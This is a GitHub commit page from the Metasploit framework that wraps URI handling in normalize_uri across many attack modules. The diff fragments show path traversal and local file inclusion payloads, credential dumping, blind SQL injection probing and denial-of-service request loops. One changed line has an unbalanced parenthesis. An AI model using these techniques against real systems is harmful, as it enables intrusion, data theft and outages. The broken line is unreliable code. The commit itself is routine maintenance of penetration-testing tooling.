Skip to content

Commit

Permalink
Add normalize_uri to modules that may have
Browse files Browse the repository at this point in the history
been missed by PULL 1045.

Please ensure PULL 1045 is in place prior to
looking at this (as it implements normalize_uri)

ref --> rapid7#1045
  • Loading branch information
ChrisJohnRiley committed Nov 8, 2012
1 parent 3df9dfc commit f88ec5c
Show file tree
Hide file tree
Showing 178 changed files with 413 additions and 425 deletions.
3 changes: 2 additions & 1 deletion modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb
Original file line number Diff line number Diff line change
Expand Up @@ -79,8 +79,9 @@ def run_host(ip)
print_status("Issuing password change request for: " + datastore['USERNAME'])

begin
uri = normalize_uri(datastore['TARGETURI'])
res = send_request_cgi({
'uri' => target_uri.path,
'uri' => uri,
'method' => 'POST',
'data' => data,
'headers' =>
Expand Down
2 changes: 1 addition & 1 deletion modules/auxiliary/admin/http/contentkeeper_fileaccess.rb
Original file line number Diff line number Diff line change
Expand Up @@ -48,7 +48,7 @@ def run_host(ip)
res = send_request_raw(
{
'method' => 'POST',
'uri' => datastore['URL'] + '?-o+' + '/home/httpd/html/' + tmpfile + '+' + datastore['FILE'],
'uri' => normalize_uri(datastore['URL']) + '?-o+' + '/home/httpd/html/' + tmpfile + '+' + datastore['FILE'],
}, 25)

if (res and res.code == 500)
Expand Down
4 changes: 2 additions & 2 deletions modules/auxiliary/admin/http/iis_auth_bypass.rb
Original file line number Diff line number Diff line change
Expand Up @@ -43,7 +43,7 @@ def initialize(info = {})


def has_auth
uri = target_uri.path
uri = normalize_uri(target_uri.path)
uri << '/' if uri[-1, 1] != '/'

res = send_request_cgi({
Expand All @@ -56,7 +56,7 @@ def has_auth
end

def try_auth
uri = target_uri.path
uri = normalize_uri(target_uri.path)
uri << '/' if uri[-1, 1] != '/'
uri << Rex::Text.rand_text_alpha(rand(10)+5) + ".#{Rex::Text.rand_text_alpha(3)}"

Expand Down
2 changes: 1 addition & 1 deletion modules/auxiliary/admin/http/intersil_pass_reset.rb
Original file line number Diff line number Diff line change
Expand Up @@ -73,7 +73,7 @@ def run
@peer = "#{rhost}:#{rport}"
return if check != Exploit::CheckCode::Vulnerable

uri = target_uri.path
uri = normalize_uri(target_uri.path)
uri << '/' if uri[-1,1] != '/'

res = send_request_cgi({
Expand Down
2 changes: 1 addition & 1 deletion modules/auxiliary/admin/http/jboss_seam_exec.rb
Original file line number Diff line number Diff line change
Expand Up @@ -42,7 +42,7 @@ def initialize(info = {})
end

def run
jbr = datastore['JBOSS_ROOT']
jbr = normalize_uri(datastore['JBOSS_ROOT'])
cmd_enc = ""
cmd_enc << Rex::Text.uri_encode(datastore["CMD"])

Expand Down
3 changes: 2 additions & 1 deletion modules/auxiliary/admin/http/scrutinizer_add_user.rb
Original file line number Diff line number Diff line change
Expand Up @@ -45,9 +45,10 @@ def initialize(info = {})
end

def run
uri = normalize_uri(target_uri.path)
res = send_request_cgi({
'method' => 'POST',
'uri' => target_uri.path,
'uri' => uri,
'vars_post' => {
'tool' => 'userprefs',
'newUser' => datastore['USERNAME'],
Expand Down
4 changes: 2 additions & 2 deletions modules/auxiliary/admin/http/typo3_sa_2009_001.rb
Original file line number Diff line number Diff line change
Expand Up @@ -68,6 +68,7 @@ def run
# Null byte fixed in PHP 5.3.4
#

uri = normalize_uri(datastore['URI'])
case datastore['RFILE']
when nil
# Nothing
Expand Down Expand Up @@ -100,8 +101,7 @@ def run
juhash = Digest::MD5.hexdigest(juarray)
juhash = juhash[0..9] # shortMD5 value for use as juhash

file_uri = "#{datastore['URI']}/index.php?jumpurl=#{jumpurl}&juSecure=1&locationData=#{locationData}&juHash=#{juhash}"
file_uri = file_uri.sub("//", "/") # Prevent double // from appearing in uri
file_uri = "#{uri}/index.php?jumpurl=#{jumpurl}&juSecure=1&locationData=#{locationData}&juHash=#{juhash}"
vprint_status("Checking Encryption Key [#{i}/1000]: #{final}")

begin
Expand Down
3 changes: 2 additions & 1 deletion modules/auxiliary/admin/tikiwiki/tikidblib.rb
Original file line number Diff line number Diff line change
Expand Up @@ -52,7 +52,8 @@ def initialize(info = {})
def run
print_status("Establishing a connection to the target...")

rpath = datastore['URI'] + "/tiki-lastchanges.php?days=1&offset=0&sort_mode="
uri = normalize_uri(datastore['URI'])
rpath = uri + "/tiki-lastchanges.php?days=1&offset=0&sort_mode="

res = send_request_raw({
'uri' => rpath,
Expand Down
3 changes: 2 additions & 1 deletion modules/auxiliary/admin/webmin/file_disclosure.rb
Original file line number Diff line number Diff line change
Expand Up @@ -70,7 +70,8 @@ def initialize(info = {})
def run
print_status("Attempting to retrieve #{datastore['RPATH']}...")

uri = Rex::Text.uri_encode(datastore['DIR']) + "/..%01" * 40 + Rex::Text.uri_encode(datastore['RPATH'])
dir = normalize_uri(datastore['DIR'])
uri = Rex::Text.uri_encode(dir) + "/..%01" * 40 + Rex::Text.uri_encode(datastore['RPATH'])

res = send_request_raw({
'uri' => uri,
Expand Down
2 changes: 1 addition & 1 deletion modules/auxiliary/dos/http/apache_range_dos.rb
Original file line number Diff line number Diff line change
Expand Up @@ -50,7 +50,7 @@ def initialize(info = {})
end

def run
uri = datastore['URI']
uri = normalize_uri(datastore['URI'])
ranges = ''
for i in (0..1299) do
ranges += ",5-" + i.to_s
Expand Down
2 changes: 1 addition & 1 deletion modules/auxiliary/dos/http/hashcollision_dos.rb
Original file line number Diff line number Diff line change
Expand Up @@ -202,7 +202,7 @@ def run
print_status("Sending request ##{x}...")
opts = {
'method' => 'POST',
'uri' => datastore['URL'],
'uri' => normalize_uri(datastore['URL']),
'data' => payload
}
begin
Expand Down
2 changes: 1 addition & 1 deletion modules/auxiliary/dos/http/sonicwall_ssl_format.rb
Original file line number Diff line number Diff line change
Expand Up @@ -55,7 +55,7 @@ def run
fmt = datastore['FORMAT'] + "XX" # XX is 2 bytes used to mark end of memory garbage for regexp
begin
res = send_request_raw({
'uri' => datastore['URI'] + fmt,
'uri' => normalize_uri(datastore['URI']) + fmt,
})

if res and res.code == 200
Expand Down
2 changes: 1 addition & 1 deletion modules/auxiliary/dos/http/webrick_regex.rb
Original file line number Diff line number Diff line change
Expand Up @@ -44,7 +44,7 @@ def initialize(info = {})
def run
begin
o = {
'uri' => datastore['URI'] || '/',
'uri' => normalize_uri(datastore['URI']) || '/',
'headers' => {
'If-None-Match' => %q{foo=""} + %q{bar="baz" } * 100
}
Expand Down
5 changes: 3 additions & 2 deletions modules/auxiliary/dos/windows/http/ms10_065_ii6_asp_dos.rb
Original file line number Diff line number Diff line change
Expand Up @@ -52,15 +52,16 @@ def initialize(info = {})


def run
print_status("Attacking http://#{datastore['VHOST'] || rhost}:#{rport}#{datastore['URI']}")
uri = normalize_uri(datastore['URI'])
print_status("Attacking http://#{datastore['VHOST'] || rhost}:#{rport}#{uri}")

begin
while(1)
begin
connect
payload = "C=A&" * 40000
length = payload.size
sploit = "HEAD #{datastore['URI']} HTTP/1.1\r\n"
sploit = "HEAD #{uri} HTTP/1.1\r\n"
sploit << "Host: #{datastore['VHOST'] || rhost}\r\n"
sploit << "Connection:Close\r\n"
sploit << "Content-Type: application/x-www-form-urlencoded\r\n"
Expand Down
4 changes: 2 additions & 2 deletions modules/auxiliary/fuzzers/http/http_form_field.rb
Original file line number Diff line number Diff line change
Expand Up @@ -484,7 +484,7 @@ def run
print_status("Grabbing webpage #{datastore['URL']} from #{datastore['RHOST']}")
response = send_request_raw(
{
'uri' => datastore['URL'],
'uri' => normalize_uri(datastore['URL']),
'version' => '1.1',
'method' => 'GET',
'headers' => @get_data_headers
Expand All @@ -502,7 +502,7 @@ def run

response = send_request_raw(
{
'uri' => datastore['URL'],
'uri' => normalize_uri(datastore['URL']),
'version' => '1.1',
'method' => 'GET',
'headers' => @get_data_headers
Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -47,8 +47,9 @@ def initialize(info = {})
def run_host(ip)

print_status("#{rhost}:#{rport} - Sending request...")
uri = normalize_uri(target_uri.path)
res = send_request_cgi({
'uri' => "/#{target_uri.to_s}",
'uri' => uri,
'method' => 'GET',
})

Expand Down
6 changes: 4 additions & 2 deletions modules/auxiliary/scanner/http/apache_userdir_enum.rb
Original file line number Diff line number Diff line change
Expand Up @@ -60,7 +60,8 @@ def initialize
end

def target_url
"http://#{vhost}:#{rport}#{datastore['URI']}"
uri = normalize_uri(datastore['URI'])
"http://#{vhost}:#{rport}#{uri}"
end

def run_host(ip)
Expand Down Expand Up @@ -88,7 +89,8 @@ def run_host(ip)
def do_login(user)

vprint_status("#{target_url}~#{user} - Trying UserDir: '#{user}'")
payload = "#{datastore['URI']}~#{user}/"
uri = normalize_uri(datastore['URI'])
payload = "#{uri}~#{user}/"
begin
res = send_request_cgi(
{
Expand Down
6 changes: 4 additions & 2 deletions modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb
Original file line number Diff line number Diff line change
Expand Up @@ -58,8 +58,9 @@ def rport
end

def run_host(ip)
uri = normalize_uri(target_uri.path)
res = send_request_cgi({
'uri' => target_uri.to_s,
'uri' => uri,
'method' => 'GET'})

if not res
Expand All @@ -71,6 +72,7 @@ def run_host(ip)
end

def accessfile(rhost)
uri = normalize_uri(target_uri.path)
print_status("#{rhost}:#{rport} Connecting to Crowd SOAP Interface")

soapenv = 'http://schemas.xmlsoap.org/soap/envelope/'
Expand Down Expand Up @@ -122,7 +124,7 @@ def accessfile(rhost)
data << '</soap:attributes>' + "\r\n"

res = send_request_cgi({
'uri' => target_uri.to_s,
'uri' => uri,
'method' => 'POST',
'ctype' => 'text/xml; charset=UTF-8',
'data' => data,
Expand Down
11 changes: 6 additions & 5 deletions modules/auxiliary/scanner/http/axis_local_file_include.rb
Original file line number Diff line number Diff line change
Expand Up @@ -47,11 +47,12 @@ def initialize
end

def target_url
"http://#{vhost}:#{rport}#{datastore['URI']}"
uri = normalize_uri(datastore['URI'])
"http://#{vhost}:#{rport}#{uri}"
end

def run_host(ip)
uri = datastore['URI']
uri = normalize_uri(datastore['URI'])

begin
res = send_request_raw({
Expand All @@ -62,11 +63,11 @@ def run_host(ip)
if (res and res.code == 200)
extract_uri = res.body.to_s.match(/\/axis2\/services\/([^\s]+)\?/)
new_uri = "/axis2/services/#{$1}"

new_uri = normalize_uri(new_uri)
get_credentials(new_uri)

else
print_status("#{target_url} - Apache Axis - The remote page not accessible")
print_status("#{uri} - Apache Axis - The remote page not accessible")
return

end
Expand All @@ -86,7 +87,7 @@ def get_credentials(uri)
'uri' => "#{uri}" + lfi_payload,
}, 25)

print_status("#{target_url} - Apache Axis - Dumping administrative credentials")
print_status("#{uri} - Apache Axis - Dumping administrative credentials")

if (res and res.code == 200)
if res.body.to_s.match(/axisconfig/)
Expand Down
2 changes: 1 addition & 1 deletion modules/auxiliary/scanner/http/backup_file.rb
Original file line number Diff line number Diff line change
Expand Up @@ -53,7 +53,7 @@ def run_host(ip)
]

bakextensions.each do |ext|
file = datastore['PATH']+ext
file = normalize_uri(datastore['PATH'])+ext
check_for_file(file)
end
if datastore['PATH'] =~ %r#(.*)(/.+$)#
Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -51,11 +51,12 @@ def initialize
end

def target_url
"http://#{vhost}:#{rport}#{datastore['URI']}"
uri = normalize_uri(datastore['URI']
"http://#{vhost}:#{rport}#{uri}"
end

def run_host(ip)
uri = datastore['URI']
uri = normalize_uri(datastore['URI'])
file = datastore['FILE']
payload = "?locale=/../../../../../../..#{file}%00"

Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -49,7 +49,7 @@ def initialize(info = {})


def run_host(ip)
base = target_uri.path
base = normalize_uri(target_uri.path)
base << '/' if base[-1,1] != '/'

peer = "#{ip}:#{rport}"
Expand Down
12 changes: 6 additions & 6 deletions modules/auxiliary/scanner/http/blind_sql_query.rb
Original file line number Diff line number Diff line change
Expand Up @@ -141,7 +141,7 @@ def run_host(ip)
#SEND NORMAL REQUEST
begin
normalres = send_request_cgi({
'uri' => datastore['PATH'],
'uri' => normalize_uri(datastore['PATH']),
'vars_get' => gvars,
'method' => http_method,
'ctype' => 'application/x-www-form-urlencoded',
Expand Down Expand Up @@ -189,7 +189,7 @@ def run_host(ip)

begin
trueres = send_request_cgi({
'uri' => datastore['PATH'],
'uri' => normalize_uri(datastore['PATH']),
'vars_get' => testgvars,
'method' => http_method,
'ctype' => 'application/x-www-form-urlencoded',
Expand All @@ -206,7 +206,7 @@ def run_host(ip)

begin
falseres = send_request_cgi({
'uri' => datastore['PATH'],
'uri' => normalize_uri(datastore['PATH']),
'vars_get' => testgvars,
'method' => http_method,
'ctype' => 'application/x-www-form-urlencoded',
Expand Down Expand Up @@ -236,7 +236,7 @@ def run_host(ip)
:port => rport,
:vhost => vhost,
:ssl => ssl,
:path => datastore['PATH'],
:path => normalize_uri(datastore['PATH']),
:method => http_method,
:pname => key,
:proof => "blind sql inj.",
Expand Down Expand Up @@ -272,7 +272,7 @@ def run_host(ip)

begin
trueres = send_request_cgi({
'uri' => datastore['PATH'],
'uri' => normalize_uri(datastore['PATH']),
'vars_get' => gvars,
'method' => http_method,
'ctype' => 'application/x-www-form-urlencoded',
Expand All @@ -297,7 +297,7 @@ def run_host(ip)

begin
falseres = send_request_cgi({
'uri' => datastore['PATH'],
'uri' => normalize_uri(datastore['PATH']),
'vars_get' => gvars,
'method' => http_method,
'ctype' => 'application/x-www-form-urlencoded',
Expand Down
2 changes: 1 addition & 1 deletion modules/auxiliary/scanner/http/brute_dirs.rb
Original file line number Diff line number Diff line change
Expand Up @@ -59,7 +59,7 @@ def run_host(ip)

conn = false

tpath = datastore['PATH']
tpath = normalize_uri(datastore['PATH'])
if tpath[-1,1] != '/'
tpath += '/'
end
Expand Down
2 changes: 1 addition & 1 deletion modules/auxiliary/scanner/http/clansphere_traversal.rb
Original file line number Diff line number Diff line change
Expand Up @@ -45,7 +45,7 @@ def initialize(info = {})


def run_host(ip)
base = target_uri.path
base = normalize_uri(target_uri.path)
base << '/' if base[-1,1] != '/'

peer = "#{ip}:#{rport}"
Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -57,7 +57,7 @@ def initialize

def run_host(ip)

url = datastore['URL']
url = normalize_uri(datastore['URL'])
locale = "?locale="
trav = datastore['PATH']

Expand Down
Loading

0 comments on commit f88ec5c

Please sign in to comment.